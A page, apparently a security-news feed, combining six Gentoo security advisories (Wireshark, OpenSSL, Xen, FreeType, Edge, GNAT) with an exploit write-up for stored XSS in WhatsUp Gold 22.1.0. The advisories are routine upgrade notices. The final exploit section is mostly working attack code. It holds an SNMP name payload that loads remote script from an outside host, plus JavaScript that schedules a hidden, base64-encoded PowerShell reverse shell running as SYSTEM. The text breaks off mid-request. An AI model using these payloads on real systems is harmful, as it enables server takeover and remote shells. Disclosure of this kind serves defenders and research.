Gentoo Linux Security Advisory 202402-9 - Multiple out-of-bounds read vulnerabilities have been discovered in Wireshark. Versions greater than or equal to 4.0.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Wireshark: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #915224, #917421  
       ID: 202402-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple out-of-bounds read vulnerabilities have been discovered in  
Wireshark.

Background  
==========

Wireshark is a versatile network protocol analyzer.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-analyzer/wireshark  < 4.0.11      >= 4.0.11

Description  
===========

Multiple vulnerabilities have been discovered in Wireshark. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Wireshark users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-4.0.11"

References  
==========

[ 1 ] CVE-2023-5371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5371  
[ 2 ] CVE-2023-6174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6174  
[ 3 ] WNPA-SEC-2023-27  
[ 4 ] WNPA-SEC-2023-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-09

Gentoo Linux Security Advisory 202402-8 - Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in denial of service. Versions greater than or equal to 3.0.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenSSL: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #876787, #893446, #902779, #903545, #907413, #910556, #911560  
       ID: 202402-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in OpenSSL, the worst of which  
could result in denial of service.

Background  
==========

OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer  
(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general  
purpose cryptography library.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/openssl  < 3.0.10      >= 3.0.10

Description  
===========

Multiple vulnerabilities have been discovered in OpenSSL. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenSSL users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/openssl-3.0.10"

References  
==========

[ 1 ] CVE-2022-3358  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3358  
[ 2 ] CVE-2022-4203  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4203  
[ 3 ] CVE-2022-4304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4304  
[ 4 ] CVE-2022-4450  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4450  
[ 5 ] CVE-2023-0215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0215  
[ 6 ] CVE-2023-0216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0216  
[ 7 ] CVE-2023-0217  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0217  
[ 8 ] CVE-2023-0286  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0286  
[ 9 ] CVE-2023-0401  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0401  
[ 10 ] CVE-2023-0464  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0464  
[ 11 ] CVE-2023-0465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0465  
[ 12 ] CVE-2023-0466  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0466  
[ 13 ] CVE-2023-2650  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2650  
[ 14 ] CVE-2023-2975  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2975  
[ 15 ] CVE-2023-3446  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3446  
[ 16 ] CVE-2023-3817  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3817

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-08

Gentoo Linux Security Advisory 202402-7 - Multiple vulnerabilities have been found in Xen, the worst of which can lead to arbitrary code execution. Versions greater than or equal to 4.16.6_pre1 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: Xen: Multiple Vulnerabilities     Date: February 04, 2024     Bugs: #754105, #757126, #826998, #837575, #858122, #876790, #879031, #903624, #905389, #915970       ID: 202402-07- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis========Multiple vulnerabilities have been found in Xen, the worst of which canlead to arbitrary code execution.Background==========Xen is a bare-metal hypervisor.Affected packages=================Package            Vulnerable     Unaffected-----------------  -------------  --------------app-emulation/xen  < 4.16.6_pre1  >= 4.16.6_pre1Description===========Multiple vulnerabilities have been discovered in Xen. Please review theCVE identifiers referenced below for details.Impact======Please review the referenced CVE identifiers for details.Workaround==========There is no known workaround at this time.Resolution==========All Xen users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.16.6_pre1"References==========[ 1 ] CVE-2021-28703      https://nvd.nist.gov/vuln/detail/CVE-2021-28703[ 2 ] CVE-2021-28704      https://nvd.nist.gov/vuln/detail/CVE-2021-28704[ 3 ] CVE-2021-28705      https://nvd.nist.gov/vuln/detail/CVE-2021-28705[ 4 ] CVE-2021-28706      https://nvd.nist.gov/vuln/detail/CVE-2021-28706[ 5 ] CVE-2021-28707      https://nvd.nist.gov/vuln/detail/CVE-2021-28707[ 6 ] CVE-2021-28708      https://nvd.nist.gov/vuln/detail/CVE-2021-28708[ 7 ] CVE-2021-28709      https://nvd.nist.gov/vuln/detail/CVE-2021-28709[ 8 ] CVE-2022-23816      https://nvd.nist.gov/vuln/detail/CVE-2022-23816[ 9 ] CVE-2022-23824      https://nvd.nist.gov/vuln/detail/CVE-2022-23824[ 10 ] CVE-2022-23825      https://nvd.nist.gov/vuln/detail/CVE-2022-23825[ 11 ] CVE-2022-26356      https://nvd.nist.gov/vuln/detail/CVE-2022-26356[ 12 ] CVE-2022-26357      https://nvd.nist.gov/vuln/detail/CVE-2022-26357[ 13 ] CVE-2022-26358      https://nvd.nist.gov/vuln/detail/CVE-2022-26358[ 14 ] CVE-2022-26359      https://nvd.nist.gov/vuln/detail/CVE-2022-26359[ 15 ] CVE-2022-26360      https://nvd.nist.gov/vuln/detail/CVE-2022-26360[ 16 ] CVE-2022-26361      https://nvd.nist.gov/vuln/detail/CVE-2022-26361[ 17 ] CVE-2022-27672      https://nvd.nist.gov/vuln/detail/CVE-2022-27672[ 18 ] CVE-2022-29900      https://nvd.nist.gov/vuln/detail/CVE-2022-29900[ 19 ] CVE-2022-29901      https://nvd.nist.gov/vuln/detail/CVE-2022-29901[ 20 ] CVE-2022-33746      https://nvd.nist.gov/vuln/detail/CVE-2022-33746[ 21 ] CVE-2022-33747      https://nvd.nist.gov/vuln/detail/CVE-2022-33747[ 22 ] CVE-2022-33748      https://nvd.nist.gov/vuln/detail/CVE-2022-33748[ 23 ] CVE-2022-33749      https://nvd.nist.gov/vuln/detail/CVE-2022-33749[ 24 ] CVE-2022-42309      https://nvd.nist.gov/vuln/detail/CVE-2022-42309[ 25 ] CVE-2022-42310      https://nvd.nist.gov/vuln/detail/CVE-2022-42310[ 26 ] CVE-2022-42319      https://nvd.nist.gov/vuln/detail/CVE-2022-42319[ 27 ] CVE-2022-42320      https://nvd.nist.gov/vuln/detail/CVE-2022-42320[ 28 ] CVE-2022-42321      https://nvd.nist.gov/vuln/detail/CVE-2022-42321[ 29 ] CVE-2022-42322      https://nvd.nist.gov/vuln/detail/CVE-2022-42322[ 30 ] CVE-2022-42323      https://nvd.nist.gov/vuln/detail/CVE-2022-42323[ 31 ] CVE-2022-42324      https://nvd.nist.gov/vuln/detail/CVE-2022-42324[ 32 ] CVE-2022-42325      https://nvd.nist.gov/vuln/detail/CVE-2022-42325[ 33 ] CVE-2022-42326      https://nvd.nist.gov/vuln/detail/CVE-2022-42326[ 34 ] CVE-2022-42327      https://nvd.nist.gov/vuln/detail/CVE-2022-42327[ 35 ] CVE-2022-42330      https://nvd.nist.gov/vuln/detail/CVE-2022-42330[ 36 ] CVE-2022-42331      https://nvd.nist.gov/vuln/detail/CVE-2022-42331[ 37 ] CVE-2022-42332      https://nvd.nist.gov/vuln/detail/CVE-2022-42332[ 38 ] CVE-2022-42333      https://nvd.nist.gov/vuln/detail/CVE-2022-42333[ 39 ] CVE-2022-42334      https://nvd.nist.gov/vuln/detail/CVE-2022-42334[ 40 ] CVE-2022-42335      https://nvd.nist.gov/vuln/detail/CVE-2022-42335[ 41 ] XSA-351[ 42 ] XSA-355[ 43 ] XSA-385[ 44 ] XSA-387[ 45 ] XSA-388[ 46 ] XSA-389[ 47 ] XSA-397[ 48 ] XSA-399[ 49 ] XSA-400[ 50 ] XSA-407[ 51 ] XSA-412[ 52 ] XSA-414[ 53 ] XSA-415[ 54 ] XSA-416[ 55 ] XSA-417[ 56 ] XSA-418[ 57 ] XSA-419[ 58 ] XSA-420[ 59 ] XSA-421[ 60 ] XSA-422[ 61 ] XSA-425[ 62 ] XSA-430Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202402-07Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-07

Gentoo Linux Security Advisory 202402-6 - Multiple vulnerabilities have been discovered in FreeType, the worst of which can lead to remote code execution. Versions greater than or equal to 2.13.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: FreeType: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #840224, #881443  
       ID: 202402-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in FreeType, the worst of  
which can lead to remote code execution.

Background  
==========

FreeType is a high-quality and portable font engine.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
media-libs/freetype  < 2.13.0      >= 2.13.0

Description  
===========

Multiple vulnerabilities have been discovered in FreeType. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All FreeType users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/freetype-2.13.0"

References  
==========

[ 1 ] CVE-2022-27404  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27404  
[ 2 ] CVE-2022-27405  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27405  
[ 3 ] CVE-2022-27406  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27406  
[ 4 ] CVE-2023-2004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2004

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-06

Gentoo Linux Security Advisory 202402-5 - Multiple vulnerabilities have been discovered in Microsoft Edge, the worst of which could lead to remote code execution. Versions greater than or equal to 120.0.2210.61 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Microsoft Edge: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #907817, #908518, #918586, #919495  
       ID: 202402-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Microsoft Edge, the  
worst of which could lead to remote code execution.

Background  
==========

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable       Unaffected  
-------------------------  ---------------  ----------------  
www-client/microsoft-edge  < 120.0.2210.61  >= 120.0.2210.61

Description  
===========

Multiple vulnerabilities have been discovered in Microsoft Edge. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-120.0.2210.61"

References  
==========

[ 1 ] CVE-2023-29345  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29345  
[ 2 ] CVE-2023-33143  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33143  
[ 3 ] CVE-2023-33145  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33145  
[ 4 ] CVE-2023-35618  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35618  
[ 5 ] CVE-2023-36022  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36022  
[ 6 ] CVE-2023-36029  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36029  
[ 7 ] CVE-2023-36034  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36034  
[ 8 ] CVE-2023-36409  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36409  
[ 9 ] CVE-2023-36559  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36559  
[ 10 ] CVE-2023-36562  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36562  
[ 11 ] CVE-2023-36727  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36727  
[ 12 ] CVE-2023-36735  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36735  
[ 13 ] CVE-2023-36741  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36741  
[ 14 ] CVE-2023-36787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36787  
[ 15 ] CVE-2023-36880  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36880  
[ 16 ] CVE-2023-38174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38174

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-05

Gentoo Linux Security Advisory 202402-4 - A vulnerability has been discovered in GNAT Ada Suite which can lead to remote code execution. Versions prior to 2019-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNAT Ada Suite: Remote Code Execution  
     Date: February 03, 2024  
     Bugs: #787440  
       ID: 202402-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GNAT Ada Suite which can lead to  
remote code execution.

Background  
==========

The GNAT Ada Suite is an Ada development environment.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
dev-ada/gnat-suite-bin  < 2019-r2     Vulnerable!

Description  
===========

A vulnerability has been discovered in GNAT Ada Suite. Please review the  
CVE identifier referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for GNAT Ada Suite. We recommend that  
users unmerge it:

  # emerge --ask --depclean "dev-ada/gnat-suite-bin"

References  
==========

[ 1 ] CVE-2020-27619  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27619

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-04

WhatsUp Gold 2022 version 22.1.0 Build 39 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)# Date: April 18, 2023# Exploit Author: Andreas Finstad (4ndr34z)# Vendor Homepage: https://www.whatsupgold.com# Version: v.22.1.0 Build 39# Tested on: Windows 2022 Server# CVE : CVE-2023-35759# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759WhatsUp Gold 2022 (22.1.0 Build 39) Stored XSS in sysName SNMP parameter.Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)Product Name: WhatsUp Gold 2022Version: 22.1.0 Build 39Vulnerability Type: Stored Cross-Site Scripting (XSS)Description:WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP. An attacker can exploit this vulnerability by crafting a specially crafted SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.As there is no CSRF tokens or CDP, it is trivial to create a javascript payload that adds an scheduled action on the server, that executes code as "NT System". In my POC code, I add a Powershell revshell that connects out to the attacker every 5 minutes. (screenshot3)The XSS trigger when clicking the "All names and addresses"Stage:Base64 encoded id property:var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);Staged payload placed in the SNMP sysName Field on a device:<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>payload:var vhost = window.location.protocol+'\/\/'+window.location.hostaddaction();async function addaction() {var arguments = ''let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '1902',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'Accept': 'application/json',        'Content-Type': 'application/json',        'X-Requested-With': 'XMLHttpRequest',        'sec-ch-ua-mobile': '?0',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'sec-ch-ua-platform': '"macOS"',        'Sec-Fetch-Mode': 'cors',        'Sec-Fetch-Dest': 'empty',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSched